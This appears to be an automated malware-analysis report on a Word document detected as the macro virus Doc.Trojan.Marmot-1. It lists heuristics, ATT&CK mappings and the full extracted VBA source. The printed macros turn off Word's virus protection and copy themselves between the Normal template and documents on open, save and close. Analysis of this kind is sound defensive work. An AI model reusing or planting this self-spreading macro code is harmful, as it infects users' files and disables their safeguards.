MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is identified as Doc.Trojan.Marmot-1 by ClamAV. It contains VBA macros, including AutoOpen and Auto_Close, which are designed to copy the macro project to the Normal template and the active document. This behavior suggests an attempt to establish persistence or spread the infection. The macro also includes a hardcoded birthday message from 'Sergie Sad'.
Heuristics 5
-
ClamAV: Doc.Trojan.Marmot-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marmot-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2395 bytes |
SHA-256: 64a281ea00681ab08bc101dcf3a7efe147831af2e0de563c241209019df46114 |
|||
|
Detection
ClamAV:
Doc.Trojan.Marmot-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Sergie_Sad"
' ------------------ "ÄÅÍÜ ÑÓÐÊÀ" v1.0 -----------------
' -------------- 02.02.2000 (Ñ)Sergie Sad --------------
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Ìàêðîñ ñîçäàí 02.02.2000 Sergie Sad"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.Sergie_Sad.AutoOpen"
Options.SaveNormalPrompt = False
Options.VirusProtection = False
On Error GoTo fail
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="Sergie_Sad", _
Object:=wdOrganizerObjectProjectItems
fail:
End Sub
Sub FileOpen()
Attribute FileOpen.VB_Description = "Ìàêðîñ ñîçäàí 02.02.2000 Sergie Sad"
Attribute FileOpen.VB_ProcData.VB_Invoke_Func = "Normal.Sergie_Sad.FileOpen"
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Dialogs(wdDialogFileOpen).Show
On Error GoTo fail
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, Name:="Sergie_Sad", _
Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
fail:
If (Month(Now()) = 10) And (Day(Now()) = 13) Then ask = MsgBox("Íå çàáóäü ïîçäðàâèòü ìåíÿ ñ äíåì ðîæäåíèÿ. Sergie Sad (3512) 12-6818", 4096 + 64, "Ñåãîäíÿ 13 îêòÿáðÿ")
End Sub
Sub FileSave()
Attribute FileSave.VB_Description = "Ìàêðîñ ñîçäàí 02.02.2000 Sergie Sad"
Attribute FileSave.VB_ProcData.VB_Invoke_Func = "Normal.Sergie_Sad.AutoClose"
Options.SaveNormalPrompt = False
Options.VirusProtection = False
On Error GoTo fail
ActiveDocument.Save
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, Name:="Sergie_Sad", _
Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
fail:
End Sub
Sub AutoClose()
Attribute AutoClose.VB_Description = "Ìàêðîñ ñîçäàí 02.02.2000 Sergie Sad"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.Sergie_Sad.FileClose"
If ActiveDocument.BuiltInDocumentProperties(wdPropertyLastAuthor) <> "" Then Call FileSave
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.